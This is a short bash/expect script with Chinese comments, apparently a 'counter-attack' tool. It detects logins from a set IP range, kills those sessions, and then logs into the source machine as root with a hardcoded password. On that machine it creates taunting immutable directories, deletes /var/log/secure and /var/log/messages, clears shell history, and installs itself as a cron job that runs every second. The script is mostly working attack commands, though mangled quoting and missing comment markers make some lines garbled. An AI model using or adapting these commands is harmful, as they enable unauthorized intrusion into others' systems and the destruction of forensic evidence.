!/bin/bash
改成非法连接ip段,我这里是用 176.202.140 这个ip段的
who=who | grep "176.202.140.*[^)]"
[ $? -eq 0 ] && echo “发现入侵者!开始回击” || continue
ipend=${who##*140.}
ipends=${ipend%%)}
攻击者ip
ip=’176.202.140.’$ipends
中断对方的攻击
pt=${who##*root}
pt1=${pt%%2018*}
pts=${pt1}
pkill -9 -t $pts
开始反击
set timeout 5
expect << EOF
spawn ssh -o StrictHostKeyChecking=no root@$ip
expect “password” { send “Taren1\n” }
expect “#” { send “cd /root/桌面\n” }
expect “#” { send “for ((i=1;i<=10;i++)) do mkdir 您已经被反入侵; done\n” }
expect “#” { send “chattr +ia 您已经被反入侵\n” }
expect “#” { send “rm -rf /var/log/secure /var/log/messages\n” }
expect “#” { send “history -c\n” }
expect “#” { send “rm -rf ~/.bash_history\n” }
expect “#” { send “exit\n” }
EOF
设置定时任务秒级执行
[root@192 ~]# for i in {1..59}; do echo “* * * * * sleep ${i}; /root/4.sh” >>/var/spool/cron/root; done